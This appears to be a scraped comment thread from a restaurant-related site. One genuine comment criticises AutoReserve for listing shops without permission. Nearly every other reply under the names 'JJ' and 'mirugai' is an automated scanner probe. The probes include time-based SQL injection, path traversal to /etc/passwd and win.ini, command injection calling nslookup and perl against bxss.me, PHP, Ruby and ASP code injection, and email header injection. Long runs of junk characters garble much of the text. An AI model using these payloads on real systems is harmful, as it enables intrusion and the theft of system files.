\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+191-191-1=0+0+0+1 --
re: JJ
-1 OR 3+191-191-1=0+0+0+1 --
re: JJ
-1 OR 2+203-203-1=0+0+0+1
re: JJ
-1 OR 3+203-203-1=0+0+0+1
re: JJ
-1' OR 2+283-283-1=0+0+0+1 --
re: JJ
-1' OR 3+283-283-1=0+0+0+1 --
re: JJ
-1' OR 2+528-528-1=0+0+0+1 or 'bPQgTocz'='
re: JJ
-1' OR 3+528-528-1=0+0+0+1 or 'bPQgTocz'='
re: JJ
-1" OR 2+956-956-1=0+0+0+1 --
re: JJ
-1" OR 3+956-956-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
1YVlLFWK'; waitfor delay '0:0:15' --
re: JJ
-5 OR 86=(SELECT 86 FROM PG_SLEEP(15))--
re: JJ
-5) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
re: JJ
g2ZEU4DX' OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: JJ
MIJuQAiO') OR 451=(SELECT 451 FROM PG_SLEEP(15))--
re: JJ
j6qdBOWB')) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@jEKdE
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.
re: mirugai
Fa1rpfNK
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+527-527-1=0+0+0+1
re: mirugai
-1 OR 3+527-527-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
DbGkXblK'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 481=(SELECT 481 FROM PG_SLEEP(15))--
re: mirugai
q0spgWkk
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+595-595-1=0+0+0+1
re: mirugai
-1 OR 3+595-595-1=0+0+0+1
re: mirugai
-5) OR 536=(SELECT 536 FROM PG_SLEEP(15))--
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))--
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
rmqL53ty' OR 198=(SELECT 198 FROM PG_SLEEP(15))--
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
H2EEREAj') OR 387=(SELECT 387 FROM PG_SLEEP(15))--
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
kWSxSl86')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
FAk2VVkd'; waitfor delay '0:0:15' --
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@TkNLW
re: mirugai
-5 OR 462=(SELECT 462 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 688=(SELECT 688 FROM PG_SLEEP(15))--
re: mirugai
N4hkxoiD' OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: mirugai
HTPbdLJj') OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: mirugai
tALAVFO4')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@Q5O6x
re: mirugai
1MbbLEkrO
re: mirugai
response.write(9979195*9016172)
re: mirugai
'+response.write(9979195*9016172)+'
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
${10000429+9999663}
re: mirugai
"+response.write(9979195*9016172)+"
re: mirugai
%0abcc:074625.67-13555.67.df552.19990.2@bxss.me
re: mirugai
to@example.com>%0d%0abcc:074625.67-13556.67.df552.19990.2@bxss.me
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
'.gethostbyname(lc('hitxi'.'smgyzjdl57ef5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(86).chr(114).chr(82).'
re: mirugai
)
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
".gethostbyname(lc("hityj"."nwetgdbme2875.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(86).chr(108).chr(71)."
re: mirugai
!(()&&!|*|*|
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
^(#$!@#$)(()))******
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
echo xfelgt$()\ ycgrmq\nz^xyu||a #' &echo xfelgt$()\ ycgrmq\nz^xyu||a #|" &echo xfelgt$()\ ycgrmq\nz^xyu||a #
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
&echo zbmakb$()\ vtzppg\nz^xyu||a #' &echo zbmakb$()\ vtzppg\nz^xyu||a #|" &echo zbmakb$()\ vtzppg\nz^xyu||a #
re: mirugai
/etc/passwd
re: mirugai
|echo ehifdq$()\ xojrry\nz^xyu||a #' |echo ehifdq$()\ xojrry\nz^xyu||a #|" |echo ehifdq$()\ xojrry\nz^xyu||a #
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(108).concat(84).concat(121).concat(85)+(require"socket"
Socket.gethostbyname("hitks"+"ksuhoqirb6a28.bxss.me.")[3].to_s)+"
re: mirugai
%2fetc%2fpasswd
re: mirugai
(nslookup hitirokncmvir46b7e.bxss.me||perl -e "gethostbyname('hitirokncmvir46b7e.bxss.me')")
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(121).concat(67).concat(114).concat(84)+(require'socket'
Socket.gethostbyname('hitha'+'lomughgk5319f.bxss.me.')[3].to_s)+'
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
$(nslookup hitukyuzbtuou4bb98.bxss.me||perl -e "gethostbyname('hitukyuzbtuou4bb98.bxss.me')")
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
&nslookup hitzqaxvktexxa02d2.bxss.me&'\"`0&nslookup hitzqaxvktexxa02d2.bxss.me&`'
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&'\"`0&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&`'
re: mirugai
';print(md5(31337));$a='
re: mirugai
/etc/shells
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
|(nslookup hitmcbecijwkn03691.bxss.me||perl -e "gethostbyname('hitmcbecijwkn03691.bxss.me')")
re: mirugai
c:/windows/win.ini
re: mirugai
";print(md5(31337));$a="
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
`(nslookup hitlxmsmjmuvlab335.bxss.me||perl -e "gethostbyname('hitlxmsmjmuvlab335.bxss.me')")`
re: mirugai
'"
re: mirugai
bxss.me
re: mirugai
${@print(md5(31337))}
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
;(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")|(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")&(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")
re: mirugai
<!--
re: mirugai
${@print(md5(31337))}\
re: mirugai
file:///etc/passwd
re: mirugai
'.print(md5(31337)).'
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
/WEB-INF/web.xml
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
re: mirugai
1
re: mirugai
1
re: mirugai
-1 OR 2+511-511-1=0+0+0+1 --
re: mirugai
-1 OR 3+511-511-1=0+0+0+1 --
re: mirugai
-1 OR 2+535-535-1=0+0+0+1
re: mirugai
-1 OR 3+535-535-1=0+0+0+1
re: mirugai
-1' OR 2+425-425-1=0+0+0+1 --
re: mirugai
-1' OR 3+425-425-1=0+0+0+1 --
re: mirugai
-1' OR 2+384-384-1=0+0+0+1 or 'nkBUnyV9'='
re: mirugai
-1' OR 3+384-384-1=0+0+0+1 or 'nkBUnyV9'='
re: mirugai
-1" OR 2+398-398-1=0+0+0+1 --
re: mirugai
-1" OR 3+398-398-1=0+0+0+1 --
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
5lRS7Jzu'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 306=(SELECT 306 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 792=(SELECT 792 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: mirugai
yyUpVaQd' OR 989=(SELECT 989 FROM PG_SLEEP(15))--
re: mirugai
RToHKyDP') OR 653=(SELECT 653 FROM PG_SLEEP(15))--
re: mirugai
tfYkmyfa')) OR 34=(SELECT 34 FROM PG_SLEEP(15))--
re: mirugai
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@5BSix
re: mirugai
1
re: mirugai
1
re: mirugai
1
re: mirugai
1
